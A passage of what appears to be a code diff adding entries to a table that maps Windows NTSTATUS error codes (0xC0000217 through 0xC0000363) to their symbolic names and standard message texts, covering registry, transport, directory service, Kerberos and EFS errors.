+ 0xC0000217: ("STATUS_NOT_CLIENT_SESSION","The transport can only process the specified request on the client side of a session."),
+ 0xC0000218: ("STATUS_CANNOT_LOAD_REGISTRY_FILE","{Registry File Failure} The registry cannot load the hive (file): %hs or its log or alternate. It is corrupt, absent, or not writable."),
+ 0xC0000219: ("STATUS_DEBUG_ATTACH_FAILED","{Unexpected Failure in DebugActiveProcess} An unexpected failure occurred while processing a DebugActiveProcess API request. You may choose OK to terminate the process, or Cancel to ignore the error."),
+ 0xC000021A: ("STATUS_SYSTEM_PROCESS_TERMINATED","{Fatal System Error} The %hs system process terminated unexpectedly with a status of 0x%08x (0x%08x 0x%08x). The system has been shut down."),
+ 0xC000021B: ("STATUS_DATA_NOT_ACCEPTED","{Data Not Accepted} The TDI client could not handle the data received during an indication."),
+ 0xC000021C: ("STATUS_NO_BROWSER_SERVERS_FOUND","{Unable to Retrieve Browser Server List} The list of servers for this workgroup is not currently available."),
+ 0xC000021D: ("STATUS_VDM_HARD_ERROR","NTVDM encountered a hard error."),
+ 0xC000021E: ("STATUS_DRIVER_CANCEL_TIMEOUT","{Cancel Timeout} The driver %hs failed to complete a canceled I/O request in the allotted time."),
+ 0xC000021F: ("STATUS_REPLY_MESSAGE_MISMATCH","{Reply Message Mismatch} An attempt was made to reply to an LPC message, but the thread specified by the client ID in the message was not waiting on that message."),
+ 0xC0000220: ("STATUS_MAPPED_ALIGNMENT","{Mapped View Alignment Incorrect} An attempt was made to map a view of a file, but either the specified base address or the offset into the file were not aligned on the proper allocation granularity."),
+ 0xC0000221: ("STATUS_IMAGE_CHECKSUM_MISMATCH","{Bad Image Checksum} The image %hs is possibly corrupt. The header checksum does not match the computed checksum."),
+ 0xC0000222: ("STATUS_LOST_WRITEBEHIND_DATA","{Delayed Write Failed} Windows was unable to save all the data for the file %hs. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Try to save this file elsewhere."),
+ 0xC0000223: ("STATUS_CLIENT_SERVER_PARAMETERS_INVALID","The parameters passed to the server in the client/server shared memory window were invalid. Too much data may have been put in the shared memory window."),
+ 0xC0000224: ("STATUS_PASSWORD_MUST_CHANGE","The user password must be changed before logging on the first time."),
+ 0xC0000225: ("STATUS_NOT_FOUND","The object was not found."),
+ 0xC0000226: ("STATUS_NOT_TINY_STREAM","The stream is not a tiny stream."),
+ 0xC0000227: ("STATUS_RECOVERY_FAILURE","A transaction recovery failed."),
+ 0xC0000228: ("STATUS_STACK_OVERFLOW_READ","The request must be handled by the stack overflow code."),
+ 0xC0000229: ("STATUS_FAIL_CHECK","A consistency check failed."),
+ 0xC000022A: ("STATUS_DUPLICATE_OBJECTID","The attempt to insert the ID in the index failed because the ID is already in the index."),
+ 0xC000022B: ("STATUS_OBJECTID_EXISTS","The attempt to set the object ID failed because the object already has an ID."),
+ 0xC000022C: ("STATUS_CONVERT_TO_LARGE","Internal OFS status codes indicating how an allocation operation is handled. Either it is retried after the containing oNode is moved or the extent stream is converted to a large stream."),
+ 0xC000022D: ("STATUS_RETRY","The request needs to be retried."),
+ 0xC000022E: ("STATUS_FOUND_OUT_OF_SCOPE","The attempt to find the object found an object on the volume that matches by ID; however, it is out of the scope of the handle that is used for the operation."),
+ 0xC000022F: ("STATUS_ALLOCATE_BUCKET","The bucket array must be grown. Retry the transaction after doing so."),
+ 0xC0000230: ("STATUS_PROPSET_NOT_FOUND","The specified property set does not exist on the object."),
+ 0xC0000231: ("STATUS_MARSHALL_OVERFLOW","The user/kernel marshaling buffer has overflowed."),
+ 0xC0000232: ("STATUS_INVALID_VARIANT","The supplied variant structure contains invalid data."),
+ 0xC0000233: ("STATUS_DOMAIN_CONTROLLER_NOT_FOUND","A domain controller for this domain was not found."),
+ 0xC0000234: ("STATUS_ACCOUNT_LOCKED_OUT","The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested."),
+ 0xC0000235: ("STATUS_HANDLE_NOT_CLOSABLE","NtClose was called on a handle that was protected from close via NtSetInformationObject."),
+ 0xC0000236: ("STATUS_CONNECTION_REFUSED","The transport-connection attempt was refused by the remote system."),
+ 0xC0000237: ("STATUS_GRACEFUL_DISCONNECT","The transport connection was gracefully closed."),
+ 0xC0000238: ("STATUS_ADDRESS_ALREADY_ASSOCIATED","The transport endpoint already has an address associated with it."),
+ 0xC0000239: ("STATUS_ADDRESS_NOT_ASSOCIATED","An address has not yet been associated with the transport endpoint."),
+ 0xC000023A: ("STATUS_CONNECTION_INVALID","An operation was attempted on a nonexistent transport connection."),
+ 0xC000023B: ("STATUS_CONNECTION_ACTIVE","An invalid operation was attempted on an active transport connection."),
+ 0xC000023C: ("STATUS_NETWORK_UNREACHABLE","The remote network is not reachable by the transport."),
+ 0xC000023D: ("STATUS_HOST_UNREACHABLE","The remote system is not reachable by the transport."),
+ 0xC000023E: ("STATUS_PROTOCOL_UNREACHABLE","The remote system does not support the transport protocol."),
+ 0xC000023F: ("STATUS_PORT_UNREACHABLE","No service is operating at the destination port of the transport on the remote system."),
+ 0xC0000240: ("STATUS_REQUEST_ABORTED","The request was aborted."),
+ 0xC0000241: ("STATUS_CONNECTION_ABORTED","The transport connection was aborted by the local system."),
+ 0xC0000242: ("STATUS_BAD_COMPRESSION_BUFFER","The specified buffer contains ill-formed data."),
+ 0xC0000243: ("STATUS_USER_MAPPED_FILE","The requested operation cannot be performed on a file with a user mapped section open."),
+ 0xC0000244: ("STATUS_AUDIT_FAILED","{Audit Failed} An attempt to generate a security audit failed."),
+ 0xC0000245: ("STATUS_TIMER_RESOLUTION_NOT_SET","The timer resolution was not previously set by the current process."),
+ 0xC0000246: ("STATUS_CONNECTION_COUNT_LIMIT","A connection to the server could not be made because the limit on the number of concurrent connections for this account has been reached."),
+ 0xC0000247: ("STATUS_LOGIN_TIME_RESTRICTION","Attempting to log on during an unauthorized time of day for this account."),
+ 0xC0000248: ("STATUS_LOGIN_WKSTA_RESTRICTION","The account is not authorized to log on from this station."),
+ 0xC0000249: ("STATUS_IMAGE_MP_UP_MISMATCH","{UP/MP Image Mismatch} The image %hs has been modified for use on a uniprocessor system, but you are running it on a multiprocessor machine. Reinstall the image file."),
+ 0xC0000250: ("STATUS_INSUFFICIENT_LOGON_INFO","There is insufficient account information to log you on."),
+ 0xC0000251: ("STATUS_BAD_DLL_ENTRYPOINT","{Invalid DLL Entrypoint} The dynamic link library %hs is not written correctly. The stack pointer has been left in an inconsistent state. The entry point should be declared as WINAPI or STDCALL. Select YES to fail the DLL load. Select NO to continue execution. Selecting NO may cause the application to operate incorrectly."),
+ 0xC0000252: ("STATUS_BAD_SERVICE_ENTRYPOINT","{Invalid Service Callback Entrypoint} The %hs service is not written correctly. The stack pointer has been left in an inconsistent state. The callback entry point should be declared as WINAPI or STDCALL. Selecting OK will cause the service to continue operation. However, the service process may operate incorrectly."),
+ 0xC0000253: ("STATUS_LPC_REPLY_LOST","The server received the messages but did not send a reply."),
+ 0xC0000254: ("STATUS_IP_ADDRESS_CONFLICT1","There is an IP address conflict with another system on the network."),
+ 0xC0000255: ("STATUS_IP_ADDRESS_CONFLICT2","There is an IP address conflict with another system on the network."),
+ 0xC0000256: ("STATUS_REGISTRY_QUOTA_LIMIT","{Low On Registry Space} The system has reached the maximum size that is allowed for the system part of the registry. Additional storage requests will be ignored."),
+ 0xC0000257: ("STATUS_PATH_NOT_COVERED","The contacted server does not support the indicated part of the DFS namespace."),
+ 0xC0000258: ("STATUS_NO_CALLBACK_ACTIVE","A callback return system service cannot be executed when no callback is active."),
+ 0xC0000259: ("STATUS_LICENSE_QUOTA_EXCEEDED","The service being accessed is licensed for a particular number of connections. No more connections can be made to the service at this time because the service has already accepted the maximum number of connections."),
+ 0xC000025A: ("STATUS_PWD_TOO_SHORT","The password provided is too short to meet the policy of your user account. Choose a longer password."),
+ 0xC000025B: ("STATUS_PWD_TOO_RECENT","The policy of your user account does not allow you to change passwords too frequently. This is done to prevent users from changing back to a familiar, but potentially discovered, password. If you feel your password has been compromised, contact your administrator immediately to have a new one assigned."),
+ 0xC000025C: ("STATUS_PWD_HISTORY_CONFLICT","You have attempted to change your password to one that you have used in the past. The policy of your user account does not allow this. Select a password that you have not previously used."),
+ 0xC000025E: ("STATUS_PLUGPLAY_NO_DEVICE","You have attempted to load a legacy device driver while its device instance had been disabled."),
+ 0xC000025F: ("STATUS_UNSUPPORTED_COMPRESSION","The specified compression format is unsupported."),
+ 0xC0000260: ("STATUS_INVALID_HW_PROFILE","The specified hardware profile configuration is invalid."),
+ 0xC0000261: ("STATUS_INVALID_PLUGPLAY_DEVICE_PATH","The specified Plug and Play registry device path is invalid."),
+ 0xC0000262: ("STATUS_DRIVER_ORDINAL_NOT_FOUND","{Driver Entry Point Not Found} The %hs device driver could not locate the ordinal %ld in driver %hs."),
+ 0xC0000263: ("STATUS_DRIVER_ENTRYPOINT_NOT_FOUND","{Driver Entry Point Not Found} The %hs device driver could not locate the entry point %hs in driver %hs."),
+ 0xC0000264: ("STATUS_RESOURCE_NOT_OWNED","{Application Error} The application attempted to release a resource it did not own. Click OK to terminate the application."),
+ 0xC0000265: ("STATUS_TOO_MANY_LINKS","An attempt was made to create more links on a file than the file system supports."),
+ 0xC0000266: ("STATUS_QUOTA_LIST_INCONSISTENT","The specified quota list is internally inconsistent with its descriptor."),
+ 0xC0000267: ("STATUS_FILE_IS_OFFLINE","The specified file has been relocated to offline storage."),
+ 0xC0000268: ("STATUS_EVALUATION_EXPIRATION","{Windows Evaluation Notification} The evaluation period for this installation of Windows has expired. This system will shutdown in 1 hour. To restore access to this installation of Windows, upgrade this installation by using a licensed distribution of this product."),
+ 0xC0000269: ("STATUS_ILLEGAL_DLL_RELOCATION","{Illegal System DLL Relocation} The system DLL %hs was relocated in memory. The application will not run properly. The relocation occurred because the DLL %hs occupied an address range that is reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL."),
+ 0xC000026A: ("STATUS_LICENSE_VIOLATION","{License Violation} The system has detected tampering with your registered product type. This is a violation of your software license. Tampering with the product type is not permitted."),
+ 0xC000026B: ("STATUS_DLL_INIT_FAILED_LOGOFF","{DLL Initialization Failed} The application failed to initialize because the window station is shutting down."),
+ 0xC000026C: ("STATUS_DRIVER_UNABLE_TO_LOAD","{Unable to Load Device Driver} %hs device driver could not be loaded. Error Status was 0x%x."),
+ 0xC000026D: ("STATUS_DFS_UNAVAILABLE","DFS is unavailable on the contacted server."),
+ 0xC000026E: ("STATUS_VOLUME_DISMOUNTED","An operation was attempted to a volume after it was dismounted."),
+ 0xC000026F: ("STATUS_WX86_INTERNAL_ERROR","An internal error occurred in the Win32 x86 emulation subsystem."),
+ 0xC0000270: ("STATUS_WX86_FLOAT_STACK_CHECK","Win32 x86 emulation subsystem floating-point stack check."),
+ 0xC0000271: ("STATUS_VALIDATE_CONTINUE","The validation process needs to continue on to the next step."),
+ 0xC0000272: ("STATUS_NO_MATCH","There was no match for the specified key in the index."),
+ 0xC0000273: ("STATUS_NO_MORE_MATCHES","There are no more matches for the current index enumeration."),
+ 0xC0000275: ("STATUS_NOT_A_REPARSE_POINT","The NTFS file or directory is not a reparse point."),
+ 0xC0000276: ("STATUS_IO_REPARSE_TAG_INVALID","The Windows I/O reparse tag passed for the NTFS reparse point is invalid."),
+ 0xC0000277: ("STATUS_IO_REPARSE_TAG_MISMATCH","The Windows I/O reparse tag does not match the one that is in the NTFS reparse point."),
+ 0xC0000278: ("STATUS_IO_REPARSE_DATA_INVALID","The user data passed for the NTFS reparse point is invalid."),
+ 0xC0000279: ("STATUS_IO_REPARSE_TAG_NOT_HANDLED","The layered file system driver for this I/O tag did not handle it when needed."),
+ 0xC0000280: ("STATUS_REPARSE_POINT_NOT_RESOLVED","The NTFS symbolic link could not be resolved even though the initial file name is valid."),
+ 0xC0000281: ("STATUS_DIRECTORY_IS_A_REPARSE_POINT","The NTFS directory is a reparse point."),
+ 0xC0000282: ("STATUS_RANGE_LIST_CONFLICT","The range could not be added to the range list because of a conflict."),
+ 0xC0000283: ("STATUS_SOURCE_ELEMENT_EMPTY","The specified medium changer source element contains no media."),
+ 0xC0000284: ("STATUS_DESTINATION_ELEMENT_FULL","The specified medium changer destination element already contains media."),
+ 0xC0000285: ("STATUS_ILLEGAL_ELEMENT_ADDRESS","The specified medium changer element does not exist."),
+ 0xC0000286: ("STATUS_MAGAZINE_NOT_PRESENT","The specified element is contained in a magazine that is no longer present."),
+ 0xC0000287: ("STATUS_REINITIALIZATION_NEEDED","The device requires re-initialization due to hardware errors."),
+ 0xC000028A: ("STATUS_ENCRYPTION_FAILED","The file encryption attempt failed."),
+ 0xC000028B: ("STATUS_DECRYPTION_FAILED","The file decryption attempt failed."),
+ 0xC000028C: ("STATUS_RANGE_NOT_FOUND","The specified range could not be found in the range list."),
+ 0xC000028D: ("STATUS_NO_RECOVERY_POLICY","There is no encryption recovery policy configured for this system."),
+ 0xC000028E: ("STATUS_NO_EFS","The required encryption driver is not loaded for this system."),
+ 0xC000028F: ("STATUS_WRONG_EFS","The file was encrypted with a different encryption driver than is currently loaded."),
+ 0xC0000290: ("STATUS_NO_USER_KEYS","There are no EFS keys defined for the user."),
+ 0xC0000291: ("STATUS_FILE_NOT_ENCRYPTED","The specified file is not encrypted."),
+ 0xC0000292: ("STATUS_NOT_EXPORT_FORMAT","The specified file is not in the defined EFS export format."),
+ 0xC0000293: ("STATUS_FILE_ENCRYPTED","The specified file is encrypted and the user does not have the ability to decrypt it."),
+ 0xC0000295: ("STATUS_WMI_GUID_NOT_FOUND","The GUID passed was not recognized as valid by a WMI data provider."),
+ 0xC0000296: ("STATUS_WMI_INSTANCE_NOT_FOUND","The instance name passed was not recognized as valid by a WMI data provider."),
+ 0xC0000297: ("STATUS_WMI_ITEMID_NOT_FOUND","The data item ID passed was not recognized as valid by a WMI data provider."),
+ 0xC0000298: ("STATUS_WMI_TRY_AGAIN","The WMI request could not be completed and should be retried."),
+ 0xC0000299: ("STATUS_SHARED_POLICY","The policy object is shared and can only be modified at the root."),
+ 0xC000029A: ("STATUS_POLICY_OBJECT_NOT_FOUND","The policy object does not exist when it should."),
+ 0xC000029B: ("STATUS_POLICY_ONLY_IN_DS","The requested policy information only lives in the Ds."),
+ 0xC000029C: ("STATUS_VOLUME_NOT_UPGRADED","The volume must be upgraded to enable this feature."),
+ 0xC000029D: ("STATUS_REMOTE_STORAGE_NOT_ACTIVE","The remote storage service is not operational at this time."),
+ 0xC000029E: ("STATUS_REMOTE_STORAGE_MEDIA_ERROR","The remote storage service encountered a media error."),
+ 0xC000029F: ("STATUS_NO_TRACKING_SERVICE","The tracking (workstation) service is not running."),
+ 0xC00002A0: ("STATUS_SERVER_SID_MISMATCH","The server process is running under a SID that is different from the SID that is required by client."),
+ 0xC00002A1: ("STATUS_DS_NO_ATTRIBUTE_OR_VALUE","The specified directory service attribute or value does not exist."),
+ 0xC00002A2: ("STATUS_DS_INVALID_ATTRIBUTE_SYNTAX","The attribute syntax specified to the directory service is invalid."),
+ 0xC00002A3: ("STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED","The attribute type specified to the directory service is not defined."),
+ 0xC00002A4: ("STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS","The specified directory service attribute or value already exists."),
+ 0xC00002A5: ("STATUS_DS_BUSY","The directory service is busy."),
+ 0xC00002A6: ("STATUS_DS_UNAVAILABLE","The directory service is unavailable."),
+ 0xC00002A7: ("STATUS_DS_NO_RIDS_ALLOCATED","The directory service was unable to allocate a relative identifier."),
+ 0xC00002A8: ("STATUS_DS_NO_MORE_RIDS","The directory service has exhausted the pool of relative identifiers."),
+ 0xC00002A9: ("STATUS_DS_INCORRECT_ROLE_OWNER","The requested operation could not be performed because the directory service is not the master for that type of operation."),
+ 0xC00002AA: ("STATUS_DS_RIDMGR_INIT_ERROR","The directory service was unable to initialize the subsystem that allocates relative identifiers."),
+ 0xC00002AB: ("STATUS_DS_OBJ_CLASS_VIOLATION","The requested operation did not satisfy one or more constraints that are associated with the class of the object."),
+ 0xC00002AC: ("STATUS_DS_CANT_ON_NON_LEAF","The directory service can perform the requested operation only on a leaf object."),
+ 0xC00002AD: ("STATUS_DS_CANT_ON_RDN","The directory service cannot perform the requested operation on the Relatively Defined Name (RDN) attribute of an object."),
+ 0xC00002AE: ("STATUS_DS_CANT_MOD_OBJ_CLASS","The directory service detected an attempt to modify the object class of an object."),
+ 0xC00002AF: ("STATUS_DS_CROSS_DOM_MOVE_FAILED","An error occurred while performing a cross domain move operation."),
+ 0xC00002B0: ("STATUS_DS_GC_NOT_AVAILABLE","Unable to contact the global catalog server."),
+ 0xC00002B1: ("STATUS_DIRECTORY_SERVICE_REQUIRED","The requested operation requires a directory service, and none was available."),
+ 0xC00002B2: ("STATUS_REPARSE_ATTRIBUTE_CONFLICT","The reparse attribute cannot be set because it is incompatible with an existing attribute."),
+ 0xC00002B3: ("STATUS_CANT_ENABLE_DENY_ONLY","A group marked \"use for deny only\" cannot be enabled."),
+ 0xC00002B4: ("STATUS_FLOAT_MULTIPLE_FAULTS","{EXCEPTION} Multiple floating-point faults."),
+ 0xC00002B5: ("STATUS_FLOAT_MULTIPLE_TRAPS","{EXCEPTION} Multiple floating-point traps."),
+ 0xC00002B6: ("STATUS_DEVICE_REMOVED","The device has been removed."),
+ 0xC00002B7: ("STATUS_JOURNAL_DELETE_IN_PROGRESS","The volume change journal is being deleted."),
+ 0xC00002B8: ("STATUS_JOURNAL_NOT_ACTIVE","The volume change journal is not active."),
+ 0xC00002B9: ("STATUS_NOINTERFACE","The requested interface is not supported."),
+ 0xC00002C1: ("STATUS_DS_ADMIN_LIMIT_EXCEEDED","A directory service resource limit has been exceeded."),
+ 0xC00002C2: ("STATUS_DRIVER_FAILED_SLEEP","{System Standby Failed} The driver %hs does not support standby mode. Updating this driver may allow the system to go to standby mode."),
+ 0xC00002C3: ("STATUS_MUTUAL_AUTHENTICATION_FAILED","Mutual Authentication failed. The server password is out of date at the domain controller."),
+ 0xC00002C4: ("STATUS_CORRUPT_SYSTEM_FILE","The system file %1 has become corrupt and has been replaced."),
+ 0xC00002C5: ("STATUS_DATATYPE_MISALIGNMENT_ERROR","{EXCEPTION} Alignment Error A data type misalignment error was detected in a load or store instruction."),
+ 0xC00002C6: ("STATUS_WMI_READ_ONLY","The WMI data item or data block is read-only."),
+ 0xC00002C7: ("STATUS_WMI_SET_FAILURE","The WMI data item or data block could not be changed."),
+ 0xC00002C8: ("STATUS_COMMITMENT_MINIMUM","{Virtual Memory Minimum Too Low} Your system is low on virtual memory. Windows is increasing the size of your virtual memory paging file. During this process, memory requests for some applications may be denied. For more information, see Help."),
+ 0xC00002C9: ("STATUS_REG_NAT_CONSUMPTION","{EXCEPTION} Register NaT consumption faults. A NaT value is consumed on a non-speculative instruction."),
+ 0xC00002CA: ("STATUS_TRANSPORT_FULL","The transport element of the medium changer contains media, which is causing the operation to fail."),
+ 0xC00002CB: ("STATUS_DS_SAM_INIT_FAILURE","Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information."),
+ 0xC00002CC: ("STATUS_ONLY_IF_CONNECTED","This operation is supported only when you are connected to the server."),
+ 0xC00002CD: ("STATUS_DS_SENSITIVE_GROUP_VIOLATION","Only an administrator can modify the membership list of an administrative group."),
+ 0xC00002CE: ("STATUS_PNP_RESTART_ENUMERATION","A device was removed so enumeration must be restarted."),
+ 0xC00002CF: ("STATUS_JOURNAL_ENTRY_DELETED","The journal entry has been deleted from the journal."),
+ 0xC00002D0: ("STATUS_DS_CANT_MOD_PRIMARYGROUPID","Cannot change the primary group ID of a domain controller account."),
+ 0xC00002D1: ("STATUS_SYSTEM_IMAGE_BAD_SIGNATURE","{Fatal System Error} The system image %s is not properly signed. The file has been replaced with the signed file. The system has been shut down."),
+ 0xC00002D2: ("STATUS_PNP_REBOOT_REQUIRED","The device will not start without a reboot."),
+ 0xC00002D3: ("STATUS_POWER_STATE_INVALID","The power state of the current device cannot support this request."),
+ 0xC00002D4: ("STATUS_DS_INVALID_GROUP_TYPE","The specified group type is invalid."),
+ 0xC00002D5: ("STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN","In a mixed domain, no nesting of a global group if the group is security enabled."),
+ 0xC00002D6: ("STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN","In a mixed domain, cannot nest local groups with other local groups, if the group is security enabled."),
+ 0xC00002D7: ("STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER","A global group cannot have a local group as a member."),
+ 0xC00002D8: ("STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER","A global group cannot have a universal group as a member."),
+ 0xC00002D9: ("STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER","A universal group cannot have a local group as a member."),
+ 0xC00002DA: ("STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER","A global group cannot have a cross-domain member."),
+ 0xC00002DB: ("STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER","A local group cannot have another cross-domain local group as a member."),
+ 0xC00002DC: ("STATUS_DS_HAVE_PRIMARY_MEMBERS","Cannot change to a security-disabled group because primary members are in this group."),
+ 0xC00002DD: ("STATUS_WMI_NOT_SUPPORTED","The WMI operation is not supported by the data block or method."),
+ 0xC00002DE: ("STATUS_INSUFFICIENT_POWER","There is not enough power to complete the requested operation."),
+ 0xC00002DF: ("STATUS_SAM_NEED_BOOTKEY_PASSWORD","The Security Accounts Manager needs to get the boot password."),
+ 0xC00002E0: ("STATUS_SAM_NEED_BOOTKEY_FLOPPY","The Security Accounts Manager needs to get the boot key from the floppy disk."),
+ 0xC00002E1: ("STATUS_DS_CANT_START","The directory service cannot start."),
+ 0xC00002E2: ("STATUS_DS_INIT_FAILURE","The directory service could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information."),
+ 0xC00002E3: ("STATUS_SAM_INIT_FAILURE","The Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Safe Mode. Check the event log for more detailed information."),
+ 0xC00002E4: ("STATUS_DS_GC_REQUIRED","The requested operation can be performed only on a global catalog server."),
+ 0xC00002E5: ("STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY","A local group can only be a member of other local groups in the same domain."),
+ 0xC00002E6: ("STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS","Foreign security principals cannot be members of universal groups."),
+ 0xC00002E7: ("STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED","Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased."),
+ 0xC00002E9: ("STATUS_CURRENT_DOMAIN_NOT_ALLOWED","This operation cannot be performed on the current domain."),
+ 0xC00002EA: ("STATUS_CANNOT_MAKE","The directory or file cannot be created."),
+ 0xC00002EB: ("STATUS_SYSTEM_SHUTDOWN","The system is in the process of shutting down."),
+ 0xC00002EC: ("STATUS_DS_INIT_FAILURE_CONSOLE","Directory Services could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further."),
+ 0xC00002ED: ("STATUS_DS_SAM_INIT_FAILURE_CONSOLE","Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further."),
+ 0xC00002EE: ("STATUS_UNFINISHED_CONTEXT_DELETED","A security context was deleted before the context was completed. This is considered a logon failure."),
+ 0xC00002EF: ("STATUS_NO_TGT_REPLY","The client is trying to negotiate a context and the server requires user-to-user but did not send a TGT reply."),
+ 0xC00002F0: ("STATUS_OBJECTID_NOT_FOUND","An object ID was not found in the file."),
+ 0xC00002F1: ("STATUS_NO_IP_ADDRESSES","Unable to accomplish the requested task because the local machine does not have any IP addresses."),
+ 0xC00002F2: ("STATUS_WRONG_CREDENTIAL_HANDLE","The supplied credential handle does not match the credential that is associated with the security context."),
+ 0xC00002F3: ("STATUS_CRYPTO_SYSTEM_INVALID","The crypto system or checksum function is invalid because a required function is unavailable."),
+ 0xC00002F4: ("STATUS_MAX_REFERRALS_EXCEEDED","The number of maximum ticket referrals has been exceeded."),
+ 0xC00002F5: ("STATUS_MUST_BE_KDC","The local machine must be a Kerberos KDC (domain controller) and it is not."),
+ 0xC00002F6: ("STATUS_STRONG_CRYPTO_NOT_SUPPORTED","The other end of the security negotiation requires strong crypto but it is not supported on the local machine."),
+ 0xC00002F7: ("STATUS_TOO_MANY_PRINCIPALS","The KDC reply contained more than one principal name."),
+ 0xC00002F8: ("STATUS_NO_PA_DATA","Expected to find PA data for a hint of what etype to use, but it was not found."),
+ 0xC00002F9: ("STATUS_PKINIT_NAME_MISMATCH","The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Contact your administrator."),
+ 0xC00002FA: ("STATUS_SMARTCARD_LOGON_REQUIRED","Smart card logon is required and was not used."),
+ 0xC00002FB: ("STATUS_KDC_INVALID_REQUEST","An invalid request was sent to the KDC."),
+ 0xC00002FC: ("STATUS_KDC_UNABLE_TO_REFER","The KDC was unable to generate a referral for the service requested."),
+ 0xC00002FD: ("STATUS_KDC_UNKNOWN_ETYPE","The encryption type requested is not supported by the KDC."),
+ 0xC00002FE: ("STATUS_SHUTDOWN_IN_PROGRESS","A system shutdown is in progress."),
+ 0xC00002FF: ("STATUS_SERVER_SHUTDOWN_IN_PROGRESS","The server machine is shutting down."),
+ 0xC0000300: ("STATUS_NOT_SUPPORTED_ON_SBS","This operation is not supported on a computer running Windows Server 2003 for Small Business Server."),
+ 0xC0000301: ("STATUS_WMI_GUID_DISCONNECTED","The WMI GUID is no longer available."),
+ 0xC0000302: ("STATUS_WMI_ALREADY_DISABLED","Collection or events for the WMI GUID is already disabled."),
+ 0xC0000303: ("STATUS_WMI_ALREADY_ENABLED","Collection or events for the WMI GUID is already enabled."),
+ 0xC0000304: ("STATUS_MFT_TOO_FRAGMENTED","The master file table on the volume is too fragmented to complete this operation."),
+ 0xC0000305: ("STATUS_COPY_PROTECTION_FAILURE","Copy protection failure."),
+ 0xC0000306: ("STATUS_CSS_AUTHENTICATION_FAILURE","Copy protection error-DVD CSS Authentication failed."),
+ 0xC0000307: ("STATUS_CSS_KEY_NOT_PRESENT","Copy protection error-The specified sector does not contain a valid key."),
+ 0xC0000308: ("STATUS_CSS_KEY_NOT_ESTABLISHED","Copy protection error-DVD session key not established."),
+ 0xC0000309: ("STATUS_CSS_SCRAMBLED_SECTOR","Copy protection error-The read failed because the sector is encrypted."),
+ 0xC000030A: ("STATUS_CSS_REGION_MISMATCH","Copy protection error-The region of the specified DVD does not correspond to the region setting of the drive."),
+ 0xC000030B: ("STATUS_CSS_RESETS_EXHAUSTED","Copy protection error-The region setting of the drive may be permanent."),
+ 0xC0000320: ("STATUS_PKINIT_FAILURE","The Kerberos protocol encountered an error while validating the KDC certificate during smart card logon. There is more information in the system event log."),
+ 0xC0000321: ("STATUS_SMARTCARD_SUBSYSTEM_FAILURE","The Kerberos protocol encountered an error while attempting to use the smart card subsystem."),
+ 0xC0000322: ("STATUS_NO_KERB_KEY","The target server does not have acceptable Kerberos credentials."),
+ 0xC0000350: ("STATUS_HOST_DOWN","The transport determined that the remote system is down."),
+ 0xC0000351: ("STATUS_UNSUPPORTED_PREAUTH","An unsupported pre-authentication mechanism was presented to the Kerberos package."),
+ 0xC0000352: ("STATUS_EFS_ALG_BLOB_TOO_BIG","The encryption algorithm that is used on the source file needs a bigger key buffer than the one that is used on the destination file."),
+ 0xC0000353: ("STATUS_PORT_NOT_SET","An attempt to remove a processes DebugPort was made, but a port was not already associated with the process."),
+ 0xC0000354: ("STATUS_DEBUGGER_INACTIVE","An attempt to do an operation on a debug port failed because the port is in the process of being deleted."),
+ 0xC0000355: ("STATUS_DS_VERSION_CHECK_FAILURE","This version of Windows is not compatible with the behavior version of the directory forest, domain, or domain controller."),
+ 0xC0000356: ("STATUS_AUDITING_DISABLED","The specified event is currently not being audited."),
+ 0xC0000357: ("STATUS_PRENT4_MACHINE_ACCOUNT","The machine account was created prior to Windows NT 4.0. The account needs to be recreated."),
+ 0xC0000358: ("STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER","An account group cannot have a universal group as a member."),
+ 0xC0000359: ("STATUS_INVALID_IMAGE_WIN_32","The specified image file did not have the correct format; it appears to be a 32-bit Windows image."),
+ 0xC000035A: ("STATUS_INVALID_IMAGE_WIN_64","The specified image file did not have the correct format; it appears to be a 64-bit Windows image."),
+ 0xC000035B: ("STATUS_BAD_BINDINGS","The client's supplied SSPI channel bindings were incorrect."),
+ 0xC000035C: ("STATUS_NETWORK_SESSION_EXPIRED","The client session has expired; so the client must re-authenticate to continue accessing the remote resources."),
+ 0xC000035D: ("STATUS_APPHELP_BLOCK","The AppHelp dialog box canceled; thus preventing the application from starting."),
+ 0xC000035E: ("STATUS_ALL_SIDS_FILTERED","The SID filtering operation removed all SIDs."),
+ 0xC000035F: ("STATUS_NOT_SAFE_MODE_DRIVER","The driver was not loaded because the system is starting in safe mode."),
+ 0xC0000361: ("STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT","Access to %1 has been restricted by your Administrator by the default software restriction policy level."),
+ 0xC0000362: ("STATUS_ACCESS_DISABLED_BY_POLICY_PATH","Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3."),
+ 0xC0000363: ("STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER","Access to %1 has been restricted by your Administrator by software publisher policy."),
